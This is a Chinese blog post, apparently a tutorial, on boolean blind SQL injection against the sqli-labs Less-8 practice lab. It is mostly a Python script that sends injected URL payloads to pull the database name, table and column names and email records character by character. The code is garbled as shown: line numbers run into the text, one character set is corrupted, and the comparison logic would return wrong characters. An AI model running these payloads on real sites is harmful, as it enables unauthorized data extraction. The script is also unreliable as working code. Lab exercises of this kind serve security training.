盲注是注入的一种,指的是在不知道数据返回值的情况下对数据中的内容进行猜测,实施注入。盲注一般分为布尔盲注和基于时间的盲注 #coding:utf-8 2 import requests 3 4 # chars = ‘0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz‘ 5 6 #得知库名长度是8:http://localhost/sqlilabs/Less-8/?id=2‘ and length(database())>2 %23 7 8 def get_db_name(): 9 result="" 10 url_tempate="http://localhost/sqlilabs/Less-8/?id=2‘ and ascii(substr(database(),{0},1))>{1} %23" 11 chars=‘0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz‘ 12 for i in range(1,9): 13 for char in chars: 14 char_ascii=ord(char) 15 url=url_tempate.format(i,char_ascii) 16 response=requests.get(url) 17 length=len(response.text) 18 #返回的长度只有706和722 19 if length > 706: 20 result +=char 21 break 22 print (result) 23 24 #此处http://localhost/sqlilabs/Less-8/?id=2‘ and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23得知表名长度是6 25 def get_table_name(): 26 result="" 27 url_tempate="http://localhost/sqlilabs/Less-8/?id=2‘ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))>{1} %23" 28 chars = ‘0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz‘ 29 for i in range(1,7): 30 for char in chars: 31 char_ascii=ord(char) 32 url=url_tempate.format(i,char_ascii) 33 response=requests.get(url) 34 length=len(response.text) 35 #返回的长度只有706和722 36 if length>706: 37 result+=char 38 break 39 print(result) 40 41 #在得到列名之前,同样需要知道在表中的字段长度。例如我们想要知道在emails表中的长度,那么就可以使用如下的语句来获取。http://localhost/sqlilabs/Less-8/?id=2‘ and (select length(column_name) from inf 42 43 def get_column_name(): 44 result = "" 45 url_template = "http://localhost/sqlilabs/Less-8/?id=2‘ and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),{0},1))>{1} %23" 46 chars = ‘0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz‘ 47 for i in range(1,3): 48 for char in chars: 49 char_ascii = ord(char) 50 url = url_template.format(i,char_ascii) 51 response = requests.get(url) 52 length = len(response.text) 53 #返回的长度只有706和722 54 if length>706: 55 result += char 56 break 57 print(result) 58 59 def get_data(): 60 result = "" 61 url_template = "http://localhost/sqlilabs/Less-8/?id=2‘ and ascii(substr((select email_id from emails limit 0,1),{0},1))>{1} %23" 62 chars = ‘[email protected]_abcdefghijklmnopqrstuvwxyz‘ 63 for i in range(1,17): 64 for char in chars: 65 char_ascii = ord(char) 66 url = url_template.format(i,char_ascii) 67 response = requests.get(url) 68 length = len(response.text) 69 #返回的长度只有706和722 70 if length>706: 71 result += char 72 break 73 print(result)
原文地址:https://www.cnblogs.com/NBeveryday/p/8687373.html
时间: 2024-10-15 04:35:00